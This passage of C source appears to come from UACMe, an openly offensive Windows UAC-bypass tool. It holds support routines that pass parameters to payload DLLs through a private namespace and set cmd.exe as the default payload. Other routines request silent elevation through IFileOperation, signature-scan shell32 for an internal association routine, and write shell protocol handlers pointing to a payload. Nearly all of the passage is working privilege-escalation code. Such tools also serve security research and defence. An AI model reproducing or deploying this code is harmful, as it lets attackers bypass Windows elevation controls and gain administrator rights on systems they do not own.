NULL;\n ULONG bufferSize = PAGE_SIZE;\n NTSTATUS ntStatus;\n ULONG returnedLength = 0;\n\n buffer = supHeapAlloc((SIZE_T)bufferSize);\n if (buffer == NULL)\n return NULL;\n\n while ((ntStatus = NtQuerySystemInformation(\n SystemInformationClass,\n buffer,\n bufferSize,\n &returnedLength)) == STATUS_INFO_LENGTH_MISMATCH)\n {\n supHeapFree(buffer);\n bufferSize *= 2;\n\n if (bufferSize > SI_MAX_BUFFER_LENGTH)\n return NULL;\n\n buffer = supHeapAlloc((SIZE_T)bufferSize);\n if (buffer == NULL)\n return NULL;\n }\n\n if (NT_SUCCESS(ntStatus)) {\n return buffer;\n }\n\n if (buffer)\n supHeapFree(buffer);\n\n return NULL;\n}\n\n/*\n* supIsCorImageFile\n*\n* Purpose:\n*\n* Return true if image has CliHeader entry, false otherwise.\n*\n*/\nBOOL supIsCorImageFile(\n _In_ PVOID ImageBase\n)\n{\n ULONG sz = 0;\n IMAGE_COR20_HEADER* CliHeader;\n\n CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,\n IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);\n\n return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));\n}\n\n/*\n* supCreateDirectory\n*\n* Purpose:\n*\n* Native create directory.\n*\n*/\nNTSTATUS supCreateDirectory(\n _Out_opt_ PHANDLE phDirectory,\n _In_ OBJECT_ATTRIBUTES* ObjectAttributes,\n _In_ ULONG DirectoryShareFlags,\n _In_ ULONG DirectoryAttributes\n)\n{\n NTSTATUS status;\n HANDLE DirectoryHandle = NULL;\n IO_STATUS_BLOCK IoStatusBlock;\n\n if (DirectoryAttributes == 0)\n DirectoryAttributes = FILE_ATTRIBUTE_NORMAL;\n\n status = NtCreateFile(\n &DirectoryHandle,\n FILE_GENERIC_WRITE,\n ObjectAttributes,\n &IoStatusBlock,\n NULL,\n DirectoryAttributes,\n DirectoryShareFlags,\n FILE_OPEN_IF,\n FILE_DIRECTORY_FILE,\n NULL,\n 0);\n\n if (NT_SUCCESS(status)) {\n if (phDirectory)\n *phDirectory = DirectoryHandle;\n }\n return status;\n}\n\n/*\n* supxCreateBoundaryDescriptorSID\n*\n* Purpose:\n*\n* Create special SID to access isolated namespace.\n*\n*/\nPSID supxCreateBoundaryDescriptorSID(\n SID_IDENTIFIER_AUTHORITY* SidAuthority,\n UCHAR SubAuthorityCount,\n ULONG* SubAuthorities\n)\n{\n BOOL bResult = FALSE;\n ULONG i;\n PSID pSid = NULL;\n\n do {\n\n pSid = supHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount));\n if (pSid == NULL)\n break;\n\n if (!NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount)))\n break;\n\n for (i = 0; i < SubAuthorityCount; i++)\n *RtlSubAuthoritySid(pSid, i) = SubAuthorities[i];\n\n bResult = TRUE;\n\n } while (FALSE);\n\n if (bResult == FALSE) {\n if (pSid) supHeapFree(pSid);\n pSid = NULL;\n }\n\n return pSid;\n}\n\n/*\n* supCreateSharedParametersBlock\n*\n* Purpose:\n*\n* Create parameters block to be shared with payload dlls.\n*\n*/\nBOOL supCreateSharedParametersBlock(\n _In_ PVOID ucmContext)\n{\n BOOL bResult = FALSE;\n ULONG r;\n HANDLE hBoundary = NULL;\n PVOID SharedBuffer = NULL;\n SIZE_T ViewSize;\n\n PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;\n\n LARGE_INTEGER liSectionSize;\n PSID pWorldSid = NULL;\n\n SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY;\n\n UNICODE_STRING usName;\n OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0);\n\n UACME_PARAM_BLOCK ParamBlock;\n\n ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID };\n\n WCHAR szBoundaryDescriptorName[128];\n WCHAR szObjectName[128];\n\n RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName));\n supGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName);\n RtlInitUnicodeString(&usName, szBoundaryDescriptorName);\n\n //\n // Fill parameters block.\n // \n RtlSecureZeroMemory(&ParamBlock, sizeof(ParamBlock));\n\n if (context->OptionalParameterLength != 0) {\n _strncpy(ParamBlock.szParameter, MAX_PATH,\n context->szOptionalParameter, MAX_PATH);\n }\n\n ParamBlock.AkagiFlag = context->AkagiFlag;\n ParamBlock.SessionId = NtCurrentPeb()->SessionId;\n\n supWinstationToName(NULL, ParamBlock.szWinstation, MAX_PATH * 2, &r);\n supDesktopToName(NULL, ParamBlock.szDesktop, MAX_PATH * 2, &r);\n\n do {\n //\n // Create and assign boundary descriptor.\n //\n hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);\n if (hBoundary == NULL)\n break;\n\n pWorldSid = supxCreateBoundaryDescriptorSID(\n &SidWorldAuthority,\n 1,\n SubAuthoritiesWorld);\n if (pWorldSid == NULL)\n break;\n\n if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {\n break;\n }\n\n //\n // Create private namespace.\n //\n if (!NT_SUCCESS(NtCreatePrivateNamespace(\n &context->SharedContext.hIsolatedNamespace,\n MAXIMUM_ALLOWED,\n &obja,\n hBoundary)))\n {\n break;\n }\n\n obja.Attributes = OBJ_CASE_INSENSITIVE;\n obja.RootDirectory = context->SharedContext.hIsolatedNamespace;\n obja.ObjectName = &usName;\n\n //\n // Create completion event.\n //\n RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));\n supGenerateSharedObjectName((WORD)AKAGI_COMPLETION_EVENT_ID, szObjectName);\n RtlInitUnicodeString(&usName, szObjectName);\n _strcpy(ParamBlock.szSignalObject, szObjectName);\n\n //\n // Param block is complete. Calc crc32.\n //\n ParamBlock.Crc32 = RtlComputeCrc32(0, &ParamBlock, sizeof(ParamBlock));\n\n if (!NT_SUCCESS(NtCreateEvent(\n &context->SharedContext.hCompletionEvent,\n EVENT_ALL_ACCESS,\n &obja,\n NotificationEvent,\n FALSE)))\n {\n break;\n }\n\n //\n // Create shared section.\n //\n liSectionSize.QuadPart = PAGE_SIZE;\n ViewSize = PAGE_SIZE;\n\n RtlSecureZeroMemory(&szObjectName, sizeof(szObjectName));\n supGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szObjectName);\n RtlInitUnicodeString(&usName, szObjectName);\n\n if (NT_SUCCESS(NtCreateSection(\n &context->SharedContext.hSharedSection,\n SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_QUERY,\n &obja,\n &liSectionSize,\n PAGE_READWRITE,\n SEC_COMMIT,\n NULL)))\n {\n //\n // Write data to shared section.\n //\n if (NT_SUCCESS(NtMapViewOfSection(\n context->SharedContext.hSharedSection,\n NtCurrentProcess(),\n &SharedBuffer,\n 0,\n PAGE_SIZE,\n NULL,\n &ViewSize,\n ViewUnmap,\n MEM_TOP_DOWN,\n PAGE_READWRITE)))\n {\n RtlSecureZeroMemory(SharedBuffer, PAGE_SIZE);\n RtlCopyMemory(SharedBuffer, &ParamBlock, sizeof(ParamBlock));\n NtUnmapViewOfSection(NtCurrentProcess(), SharedBuffer);\n bResult = TRUE;\n }\n }\n\n\n } while (FALSE);\n\n //\n // Cleanup.\n //\n if (pWorldSid)\n supHeapFree(pWorldSid);\n if (hBoundary)\n RtlDeleteBoundaryDescriptor(hBoundary);\n\n if (bResult == FALSE) {\n if (context->SharedContext.hIsolatedNamespace) {\n NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);\n NtClose(context->SharedContext.hIsolatedNamespace);\n }\n }\n\n return bResult;\n}\n\n/*\n* supDestroySharedParametersBlock\n*\n* Purpose:\n*\n* Free shared resources.\n*\n*/\nVOID supDestroySharedParametersBlock(\n _In_ PVOID ucmContext)\n{\n PUACMECONTEXT context = (PUACMECONTEXT)ucmContext;\n\n if (context->SharedContext.hIsolatedNamespace) {\n\n if (context->SharedContext.hCompletionEvent)\n NtClose(context->SharedContext.hCompletionEvent);\n\n if (context->SharedContext.hSharedSection)\n NtClose(context->SharedContext.hSharedSection);\n\n NtDeletePrivateNamespace(context->SharedContext.hIsolatedNamespace);\n NtClose(context->SharedContext.hIsolatedNamespace);\n }\n}\n\n/*\n* supCreateUacmeContext\n*\n* Purpose:\n*\n* Allocate and fill program contexts.\n*\n*/\nPVOID supCreateUacmeContext(\n _In_ ULONG Method,\n _In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,\n _In_ ULONG OptionalParameterLength,\n _In_ PVOID DecompressRoutine\n)\n{\n BOOLEAN IsWow64;\n ULONG Seed, NtBuildNumber = 0;\n PUACMECONTEXT Context;\n HANDLE ContextHeap = NtCurrentPeb()->ProcessHeap;\n#ifdef _UCM_CONSOLE\n HMODULE hNtdll;\n#endif\n RTL_OSVERSIONINFOW osv;\n\n UNREFERENCED_PARAMETER(Method);\n\n if (OptionalParameterLength > MAX_PATH)\n return NULL;\n\n IsWow64 = supIsProcess32bit(NtCurrentProcess());\n\n RtlSecureZeroMemory(&osv, sizeof(osv));\n osv.dwOSVersionInfoSize = sizeof(osv);\n RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);\n NtBuildNumber = osv.dwBuildNumber;\n\n if (NtBuildNumber < NT_WIN7_RTM) {\n return NULL;\n }\n\n Context = RtlAllocateHeap(ContextHeap, HEAP_ZERO_MEMORY, sizeof(UACMECONTEXT));\n if (Context == NULL) {\n return NULL;\n }\n\n //\n // Create private heap, enable termination on corruption.\n //\n Context->ucmHeap = RtlCreateHeap(HEAP_GROWABLE, NULL, 0, 0, NULL, NULL);\n if (Context->ucmHeap == NULL) {\n RtlFreeHeap(ContextHeap, 0, Context);\n return NULL;\n }\n RtlSetHeapInformation(Context->ucmHeap, HeapEnableTerminationOnCorruption, NULL, 0);\n\n //\n // Set Fubuki flag.\n //\n Context->AkagiFlag = AKAGI_FLAG_KILO;\n\n //\n // Remember NtBuildNumber.\n //\n Context->dwBuildNumber = NtBuildNumber;\n\n //\n // Set Cookie for supEncode/DecodePointer.\n //\n Seed = USER_SHARED_DATA->Cookie;\n Context->Cookie = RtlRandomEx((PULONG)&Seed);\n\n //\n // Remember Wow64 process state.\n //\n Context->IsWow64 = IsWow64;\n\n //\n // Save OptionalParameter if present.\n //\n if (OptionalParameterLength) {\n _strncpy(Context->szOptionalParameter, MAX_PATH,\n OptionalParameter, OptionalParameterLength);\n Context->OptionalParameterLength = OptionalParameterLength;\n }\n\n //\n // Set IFileOperations flags.\n //\n if (NtBuildNumber > 14997) {\n Context->IFileOperationFlags = FOF_NOCONFIRMATION |\n FOFX_NOCOPYHOOKS |\n FOFX_REQUIREELEVATION;\n }\n else {\n Context->IFileOperationFlags = FOF_NOCONFIRMATION |\n FOF_SILENT |\n FOFX_SHOWELEVATIONPROMPT |\n FOFX_NOCOPYHOOKS |\n FOFX_REQUIREELEVATION;\n }\n\n //\n // Query basic directories.\n // \n // 1. SystemRoot\n // 2. System32\n if (!supQuerySystemRoot(Context)) {\n RtlDestroyHeap(Context->ucmHeap);\n RtlFreeHeap(ContextHeap, 0, Context);\n return NULL;\n }\n // 3. Temp\n supExpandEnvironmentStrings(L\"%temp%\\\\\", Context->szTempDirectory, MAX_PATH);\n\n // 4. Current directory\n if (GetCurrentDirectory(MAX_PATH, Context->szCurrentDirectory) < MAX_PATH) {\n supPathAddBackSlash(Context->szCurrentDirectory);\n }\n\n //\n // Default payload path.\n //\n _strcpy(Context->szDefaultPayload, Context->szSystemDirectory);\n _strcat(Context->szDefaultPayload, CMD_EXE);\n\n Context->DecompressRoutine = (pfnDecompressPayload)supDecodePointer(DecompressRoutine);\n\n#ifdef _UCM_CONSOLE\n hNtdll = GetModuleHandle(L\"ntdll.dll\");\n if (hNtdll) {\n Context->swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, \"swprintf_s\");\n }\n#else\n Context->swprintf_s = (PVOID)-1;\n#endif\n\n return (PVOID)Context;\n}\n\n/*\n* supDestroyUacmeContext\n*\n* Purpose:\n*\n* Destroy program contexts.\n*\n*/\nVOID supDestroyUacmeContext(\n _In_ PVOID Context\n)\n{\n PUACMECONTEXT context = (PUACMECONTEXT)Context;\n\n RtlDestroyHeap(context->ucmHeap);\n\n RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Context);\n}\n\n/*\n* supDecodeAndWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file and write decoded buffer to it.\n*\n*/\nBOOL supDecodeAndWriteBufferToFile(\n _In_ LPWSTR lpFileName,\n _In_ CONST PVOID Buffer,\n _In_ DWORD BufferSize,\n _In_ ULONG Key\n)\n{\n BOOL bResult;\n PVOID p;\n SIZE_T Size = ALIGN_UP_BY(BufferSize, PAGE_SIZE);\n\n p = supVirtualAlloc(&Size, DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN, DEFAULT_PROTECT_TYPE, NULL);\n if (p) {\n RtlCopyMemory(p, Buffer, BufferSize);\n\n EncodeBuffer(p, BufferSize, Key);\n\n bResult = supWriteBufferToFile(lpFileName, p, BufferSize);\n\n supSecureVirtualFree(p, Size, NULL);\n\n return bResult;\n }\n return FALSE;\n}\n\n/*\n* supEnableDisableWow64Redirection\n*\n* Purpose:\n*\n* Enable/Disable Wow64 redirection.\n*\n*/\nNTSTATUS supEnableDisableWow64Redirection(\n _In_ BOOL bDisable\n)\n{\n PVOID OldValue = NULL, Value;\n\n if (bDisable)\n Value = IntToPtr(TRUE);\n else\n Value = IntToPtr(FALSE);\n\n return RtlWow64EnableFsRedirectionEx(Value, &OldValue);\n}\n\n/*\n* supGetProcessDebugObject\n*\n* Purpose:\n*\n* Reference process debug object.\n*\n*/\nNTSTATUS supGetProcessDebugObject(\n _In_ HANDLE ProcessHandle,\n _Out_ PHANDLE DebugObjectHandle)\n{\n return NtQueryInformationProcess(\n ProcessHandle,\n ProcessDebugObjectHandle,\n DebugObjectHandle,\n sizeof(HANDLE),\n NULL);\n}\n\n/*\n* supIsProcessRunning\n*\n* Purpose:\n*\n* Return TRUE if the given process is running in current session.\n*\n*/\nBOOL supIsProcessRunning(\n _In_ LPWSTR ProcessName\n)\n{\n BOOL bResult = FALSE;\n ULONG nextEntryDelta = 0;\n PVOID processList;\n\n UNICODE_STRING lookupPsName;\n\n union {\n PSYSTEM_PROCESS_INFORMATION Processes;\n PBYTE ListRef;\n } List;\n\n processList = supGetSystemInfo(SystemProcessInformation);\n if (processList == NULL)\n return bResult;\n\n List.ListRef = (PBYTE)processList;\n\n RtlInitUnicodeString(&lookupPsName, ProcessName);\n\n do {\n\n List.ListRef += nextEntryDelta;\n\n if (List.Processes->SessionId == NtCurrentPeb()->SessionId) {\n\n if (RtlEqualUnicodeString(&lookupPsName,\n &List.Processes->ImageName,\n TRUE))\n {\n bResult = TRUE;\n break;\n }\n\n }\n\n nextEntryDelta = List.Processes->NextEntryDelta;\n\n } while (nextEntryDelta);\n\n supHeapFree(processList);\n\n return bResult;\n}\n\n/*\n* supBinTextEncode\n*\n* Purpose:\n*\n* Create pseudo random string from UI64 value.\n*\n*/\nVOID supBinTextEncode(\n _In_ unsigned __int64 x,\n _Inout_ wchar_t* s\n)\n{\n char tbl[64];\n char c = 0;\n int p;\n\n tbl[62] = '-';\n tbl[63] = '_';\n\n for (c = 0; c < 26; ++c)\n {\n tbl[c] = 'A' + c;\n tbl[26 + c] = 'a' + c;\n if (c < 10)\n tbl[52 + c] = '0' + c;\n }\n\n for (p = 0; p < 13; ++p)\n {\n c = x & 0x3f;\n x >>= 5;\n *s = (wchar_t)tbl[c];\n ++s;\n }\n\n *s = 0;\n}\n\n/*\n* supGenerateSharedObjectName\n*\n* Purpose:\n*\n* Create pseudo random object name from it ID.\n*\n*/\nVOID supGenerateSharedObjectName(\n _In_ WORD ObjectId,\n _Inout_ LPWSTR lpBuffer\n)\n{\n ULARGE_INTEGER value;\n\n value.LowPart = MAKELONG(\n MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION),\n MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR));\n\n value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId);\n\n supBinTextEncode(value.QuadPart, lpBuffer);\n}\n\n/*\n* supSetGlobalCompletionEvent\n*\n* Purpose:\n*\n* Set global completion event state to signaled.\n*\n*/\nVOID supSetGlobalCompletionEvent(\n VOID)\n{\n if (g_ctx->SharedContext.hCompletionEvent) {\n SetEvent(g_ctx->SharedContext.hCompletionEvent);\n }\n}\n\n/*\n* supWaitForGlobalCompletionEvent\n*\n* Purpose:\n*\n* Wait a little bit for things to complete.\n*\n*/\nNTSTATUS supWaitForGlobalCompletionEvent(\n VOID)\n{\n LARGE_INTEGER liDueTime;\n\n if (g_ctx->SharedContext.hCompletionEvent) {\n#ifdef _DEBUG\n liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(10000, 10000);\n#else\n liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(50000, 10000);\n#endif\n return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime);\n }\n\n return STATUS_WAIT_0;\n}\n\n/*\n* supOpenClassesKey\n*\n* Purpose:\n*\n* Open required subkey of current user.\n*\n*/\nNTSTATUS supOpenClassesKey(\n _In_opt_ PUNICODE_STRING UserRegEntry,\n _Out_ PHANDLE KeyHandle\n)\n{\n UNICODE_STRING usRootKey, usKeyName;\n HANDLE rootKeyHandle = NULL, keyHandle = NULL;\n OBJECT_ATTRIBUTES obja;\n NTSTATUS ntStatus;\n ULONG dummy;\n\n *KeyHandle = NULL;\n\n if (UserRegEntry == NULL) {\n\n ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n }\n else {\n RtlCopyMemory(&usRootKey, UserRegEntry, sizeof(UNICODE_STRING));\n }\n\n InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n ntStatus = NtOpenKey(&rootKeyHandle, MAXIMUM_ALLOWED, &obja);\n if (!NT_SUCCESS(ntStatus)) {\n RtlFreeUnicodeString(&usRootKey);\n return ntStatus;\n }\n\n RtlInitUnicodeString(&usKeyName, T_SOFTWARE_CLASSES);\n obja.ObjectName = &usKeyName;\n obja.RootDirectory = rootKeyHandle;\n\n ntStatus = NtCreateKey(&keyHandle,\n MAXIMUM_ALLOWED,\n &obja,\n 0,\n NULL,\n REG_OPTION_NON_VOLATILE,\n &dummy);\n\n if (NT_SUCCESS(ntStatus))\n *KeyHandle = keyHandle;\n\n NtClose(rootKeyHandle);\n\n if (UserRegEntry == NULL)\n RtlFreeUnicodeString(&usRootKey);\n\n return ntStatus;\n}\n\n\n/*\n* supRemoveRegLinkHKCU\n*\n* Purpose:\n*\n* Remove registry symlink for current user.\n*\n*/\nNTSTATUS supRemoveRegLinkHKCU(\n _In_ LPWSTR lpszRegLink\n)\n{\n NTSTATUS status = STATUS_UNSUCCESSFUL;\n\n ULONG cbKureND;\n\n UNICODE_STRING usCurrentUser, usLinkPath;\n OBJECT_ATTRIBUTES obja;\n UNICODE_STRING CmSymbolicLinkValue = RTL_CONSTANT_STRING(L\"SymbolicLinkValue\");\n\n PWSTR lpLinkKeyBuffer = NULL;\n SIZE_T memIO;\n\n HANDLE hKey = NULL;\n\n cbKureND = (ULONG)(_strlen(lpszRegLink)) * sizeof(WCHAR);\n\n InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n status = RtlFormatCurrentUserKeyPath(&usCurrentUser);\n if (!NT_SUCCESS(status))\n return status;\n\n do {\n\n memIO = sizeof(UNICODE_NULL) + usCurrentUser.MaximumLength + cbKureND;\n lpLinkKeyBuffer = (PWSTR)supHeapAlloc(memIO);\n if (lpLinkKeyBuffer == NULL)\n break;\n\n usLinkPath.Buffer = lpLinkKeyBuffer;\n usLinkPath.Length = 0;\n usLinkPath.MaximumLength = (USHORT)memIO;\n\n status = RtlAppendUnicodeStringToString(&usLinkPath, &usCurrentUser);\n if (!NT_SUCCESS(status))\n break;\n\n status = RtlAppendUnicodeToString(&usLinkPath, lpszRegLink);\n if (!NT_SUCCESS(status))\n break;\n\n InitializeObjectAttributes(&obja, &usLinkPath, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, NULL, NULL);\n\n status = NtOpenKey(&hKey,\n KEY_ALL_ACCESS,\n &obja);\n\n if (NT_SUCCESS(status)) {\n status = NtDeleteValueKey(hKey, &CmSymbolicLinkValue);\n if (NT_SUCCESS(status))\n status = NtDeleteKey(hKey);\n NtClose(hKey);\n }\n\n } while (FALSE);\n\n if (lpLinkKeyBuffer) supHeapFree(lpLinkKeyBuffer);\n RtlFreeUnicodeString(&usCurrentUser);\n\n return status;\n}\n\n/*\n* supFindPattern\n*\n* Purpose:\n*\n* Lookup pattern in buffer.\n*\n*/\nPVOID supFindPattern(\n _In_ CONST PBYTE Buffer,\n _In_ SIZE_T BufferSize,\n _In_ CONST PBYTE Pattern,\n _In_ SIZE_T PatternSize\n)\n{\n PBYTE p0 = Buffer, pnext;\n\n if (PatternSize == 0)\n return NULL;\n\n if (BufferSize < PatternSize)\n return NULL;\n\n do {\n pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);\n if (pnext == NULL)\n break;\n\n BufferSize -= (ULONG_PTR)(pnext - p0);\n\n if (BufferSize < PatternSize)\n return NULL;\n\n if (memcmp(pnext, Pattern, PatternSize) == 0)\n return pnext;\n\n p0 = pnext + 1;\n --BufferSize;\n } while (BufferSize > 0);\n\n return NULL;\n}\n\n/*\n* supLookupImageSectionByName\n*\n* Purpose:\n*\n* Lookup section pointer and size for section name.\n*\n*/\nPVOID supLookupImageSectionByName(\n _In_ CHAR* SectionName,\n _In_ ULONG SectionNameLength,\n _In_ PVOID DllBase,\n _Out_ PULONG SectionSize\n)\n{\n BOOLEAN bFound = FALSE;\n ULONG i;\n PVOID Section;\n IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);\n IMAGE_SECTION_HEADER* SectionTableEntry;\n\n //\n // Assume failure.\n //\n if (SectionSize)\n *SectionSize = 0;\n\n if (NtHeaders == NULL)\n return NULL;\n\n SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +\n sizeof(ULONG) +\n sizeof(IMAGE_FILE_HEADER) +\n NtHeaders->FileHeader.SizeOfOptionalHeader);\n\n //\n // Locate section.\n //\n i = NtHeaders->FileHeader.NumberOfSections;\n while (i > 0) {\n\n if (_strncmp_a(\n (CHAR*)SectionTableEntry->Name,\n SectionName,\n SectionNameLength) == 0)\n {\n bFound = TRUE;\n break;\n }\n\n i -= 1;\n SectionTableEntry += 1;\n }\n\n //\n // Section not found, abort scan.\n //\n if (!bFound)\n return NULL;\n\n Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);\n if (SectionSize)\n *SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n return Section;\n}\n\n/*\n* supGetUserAssocSetDB\n*\n* Purpose:\n*\n* Return pointer to UAS table and optionally count of entries.\n*\n*/\nPUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(\n _Out_opt_ PULONG SignatureCount\n)\n{\n if (SignatureCount)\n *SignatureCount = RTL_NUMBER_OF(g_UserAssocSignatures);\n\n return (PUSER_ASSOC_SIGNATURE)&g_UserAssocSignatures;\n}\n\n/*\n* supEnumUserAssocSetDB\n*\n* Purpose:\n*\n* Enumerate UserSetAssocDB.\n*\n*/\nVOID supEnumUserAssocSetDB(\n _In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,\n _In_opt_ PVOID Context\n)\n{\n USER_ASSOC_SIGNATURE* pSignature;\n ULONG i, signCount;\n\n BOOLEAN bStopEnumeration;\n\n bStopEnumeration = FALSE;\n signCount = RTL_NUMBER_OF(g_UserAssocSignatures);\n\n //\n // Iterate through signatures table.\n //\n for (i = 0; i < signCount; i++) {\n\n pSignature = g_UserAssocSignatures[i];\n\n Callback(pSignature, Context, &bStopEnumeration);\n\n if (bStopEnumeration)\n break;\n }\n}\n\n/*\n* supFindUserAssocSet\n*\n* Purpose:\n*\n* Locate internal shell routine.\n*\n*/\nNTSTATUS supFindUserAssocSet(\n _Out_ USER_ASSOC_PTR* Function\n)\n{\n HANDLE hModule;\n\n PBYTE ptrCode;\n PVOID sectionBase, patternPtr, funcPtr;\n ULONG i, j, signCount;\n ULONG sectionSize = 0, patternSize = 0;\n LONG rel = 0;\n hde64s hs;\n WCHAR szBuffer[MAX_PATH * 2];\n\n USER_ASSOC_SIGNATURE* pSignature;\n USER_ASSOC_PATTERN* pPattern;\n PVOID* pTable;\n\n Function->UserAssocSet = NULL;\n Function->Valid = FALSE;\n\n //\n // Preload shell32.dll\n //\n hModule = (HMODULE)GetModuleHandle(SHELL32_DLL);\n if (hModule == NULL) {\n _strcpy(szBuffer, g_ctx->szSystemDirectory);\n _strcat(szBuffer, SHELL32_DLL);\n hModule = (HANDLE)LoadLibraryEx(szBuffer, NULL, 0);\n }\n if (hModule == NULL)\n return STATUS_DLL_NOT_FOUND;\n\n //\n // Find text section and remember it boundaries.\n //\n sectionBase = supLookupImageSectionByName(TEXT_SECTION,\n TEXT_SECTION_LEGNTH,\n (PVOID)hModule,\n §ionSize);\n\n if (sectionBase == NULL || sectionSize == 0)\n return STATUS_INVALID_ADDRESS;\n\n\n ptrCode = NULL;\n signCount = RTL_NUMBER_OF(g_UserAssocSignatures);\n\n //\n // Iterate through signatures table and try each one for corresponding nt build.\n //\n for (i = 0; i < signCount; i++) {\n\n pSignature = g_UserAssocSignatures[i];\n\n //\n // If Windows version is match use signatures.\n //\n if (g_ctx->dwBuildNumber >= pSignature->NtBuildMin &&\n g_ctx->dwBuildNumber <= pSignature->NtBuildMax)\n {\n\n pTable = pSignature->PatternsTable;\n\n //\n // Try all available patterns.\n //\n for (j = 0; j < pSignature->PatternsCount; j++) {\n\n pPattern = pTable[j];\n\n patternPtr = pPattern->Ptr;\n patternSize = pPattern->Size;\n\n //\n // Lookup signature.\n //\n ptrCode = (PBYTE)supFindPattern(sectionBase,\n sectionSize,\n patternPtr,\n patternSize);\n\n if (ptrCode) {\n\n //\n // Pointer within section.\n //\n if (IN_REGION(ptrCode, sectionBase, sectionSize)) {\n break;\n }\n else {\n ptrCode = NULL;\n }\n }\n\n }\n\n if (ptrCode)\n break;\n }\n\n }\n\n if (ptrCode == NULL || patternSize == 0)\n return STATUS_NOT_FOUND;\n\n //\n // Skip signature bytes.\n //\n ptrCode = (PBYTE)RtlOffsetToPointer(ptrCode, patternSize);\n\n //\n // Disassemble instruction and check it to be call sus.\n //\n hde64_disasm(ptrCode, &hs);\n if (hs.flags & F_ERROR)\n return STATUS_INTERNAL_ERROR;\n\n if ((hs.len != 5) || (ptrCode[0] != 0xE8)) //call sus\n return STATUS_BAD_DATA;\n\n rel = *(PLONG)(ptrCode + 1);\n\n funcPtr = ptrCode + hs.len + rel;\n\n if (IN_REGION(funcPtr, sectionBase, sectionSize)) {\n Function->UserAssocSet = (pfnUserAssocSet)funcPtr;\n Function->Valid = TRUE;\n return STATUS_SUCCESS;\n }\n else {\n return STATUS_CONFLICTING_ADDRESSES;\n }\n\n}\n\n/*\n* supRegisterShellAssoc\n*\n* Purpose:\n*\n* Set and register shell protocol.\n*\n*/\nNTSTATUS supRegisterShellAssoc(\n _In_ LPCWSTR pszExt,\n _In_ LPCWSTR pszProgId,\n _In_ USER_ASSOC_PTR* UserAssocFunc,\n _In_ LPCWSTR lpszPayload,\n _In_ BOOL fCustomURIScheme,\n _In_opt_ LPCWSTR pszDefaultValue\n)\n{\n HANDLE classesKey = NULL, protoKey = NULL, assocKey = NULL;\n NTSTATUS ntStatus;\n SIZE_T sz;\n\n HRESULT hr = E_FAIL;\n\n WCHAR szBuffer[MAX_PATH];\n\n if (UserAssocFunc == NULL)\n return STATUS_INVALID_PARAMETER_3;\n\n if (UserAssocFunc->Valid == FALSE)\n return STATUS_INVALID_PARAMETER_3;\n\n if (lpszPayload == NULL)\n return STATUS_INVALID_PARAMETER_4;\n\n ntStatus = supOpenClassesKey(NULL, &classesKey);\n if (!NT_SUCCESS(ntStatus))\n return ntStatus;\n\n //\n // Write custom pluggable protocol handler mark.\n //\n\n if (fCustomURIScheme) {\n\n if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,\n pszExt,\n 0,\n NULL,\n REG_OPTION_NON_VOLATILE,\n KEY_SET_VALUE,\n NULL,\n (HKEY*)&protoKey,\n NULL))\n {\n RegSetValueEx(protoKey, T_URL_PROTOCOL, 0, REG_SZ, NULL, 0);\n\n if (pszDefaultValue) {\n sz = (_strlen(pszDefaultValue) + 1) * sizeof(WCHAR);\n RegSetValueEx(protoKey, TEXT(\"\"), 0, REG_SZ, (BYTE*)pszDefaultValue, (DWORD)sz);\n }\n\n RegCloseKey(protoKey);\n }\n }\n\n //\n // Create protocol registry entry.\n //\n _strcpy(szBuffer, pszProgId);\n _strcat(szBuffer, T_SHELL_OPEN);\n _strcat(szBuffer, TEXT(\"\\\\\"));\n _strcat(szBuffer, T_SHELL_COMMAND);\n\n if (ERROR_SUCCESS == RegCreateKeyEx(classesKey,\n szBuffer,\n 0,\n NULL,\n REG_OPTION_NON_VOLATILE,\n MAXIMUM_ALLOWED,\n NULL,\n (HKEY*)&assocKey,\n NULL))\n {\n\n sz = (_strlen(lpszPayload) + 1) * 